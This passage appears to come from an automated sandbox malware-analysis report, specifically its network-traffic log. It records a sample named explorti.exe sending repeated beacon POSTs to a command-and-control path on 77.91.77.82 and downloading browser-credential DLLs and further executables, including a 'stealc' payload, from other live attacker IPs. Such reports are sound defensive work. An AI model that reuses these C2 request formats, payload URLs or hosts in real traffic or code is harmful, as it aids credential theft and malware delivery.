r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: Joe Sandbox View IP Address: 77.91.77.82
Source: Joe Sandbox View IP Address: 239.255.255.250
Source: Joe Sandbox View IP Address: 77.91.77.81
Source: Joe Sandbox View ASN Name: GES-ASRU
Source: Joe Sandbox View ASN Name: FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU
Source: Joe Sandbox View JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49743 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.30
Source: unknown TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_0064BD30 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 13_2_0064BD30
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ApAseul1TrG86vn&MD=OmoaKWyK HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
  Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  Accept-Encoding: identity
  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
  Range: bytes=0-2147483646
  User-Agent: Microsoft BITS/7.8
  Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ApAseul1TrG86vn&MD=OmoaKWyK HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
  Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /account HTTP/1.1
  Host: www.youtube.com
  Connection: keep-alive
  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: "Windows"
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: navigate
  Sec-Fetch-User: ?1
  Sec-Fetch-Dest: document
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=-822503288&timestamp=1720124479360 HTTP/1.1
  Host: accounts.youtube.com
  Connection: keep-alive
  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-full-version: "117.0.5938.132"
  sec-ch-ua-arch: "x86"
  sec-ch-ua-platform: "Windows"
  sec-ch-ua-platform-version: "10.0.0"
  sec-ch-ua-model: ""
  sec-ch-ua-bitness: "64"
  sec-ch-ua-wow64: ?0
  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Dest: iframe
  Referer: https://accounts.google.com/
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1
  Host: www.google.com
  Connection: keep-alive
  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-mobile: ?0
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  sec-ch-ua-arch: "x86"
  sec-ch-ua-full-version: "117.0.5938.132"
  sec-ch-ua-platform-version: "10.0.0"
  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
  sec-ch-ua-bitness: "64"
  sec-ch-ua-model: ""
  sec-ch-ua-wow64: ?0
  sec-ch-ua-platform: "Windows"
  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
  Sec-Fetch-Site: same-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Referer: https://accounts.google.com/
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
  Cookie: NID=515=KYs2VZNA6HLpoa7_atkwavQNpoWqrMAC_SUzgHPZknZkOPrRvQCnSXBskoHaB_UM9uav3mHKwddn9nQQskf8IAFmE1vUpph0iqJMyEgCz07QJEmNJ4Fk40QarFAML8hUc6aiv_46aa_wA0oGbfLyoEyjPBGjm3QErkm3RlUm5ao
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1
  Host: 85.28.47.30
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1
  Host: 85.28.47.30
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1
  Host: 85.28.47.30
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1
  Host: 85.28.47.30
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1
  Host: 85.28.47.30
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1
  Host: 85.28.47.30
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1
  Host: 85.28.47.30
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/amadka.exe HTTP/1.1
  Host: 77.91.77.81
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1
  Host: 77.91.77.81
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1
  Host: 77.91.77.81
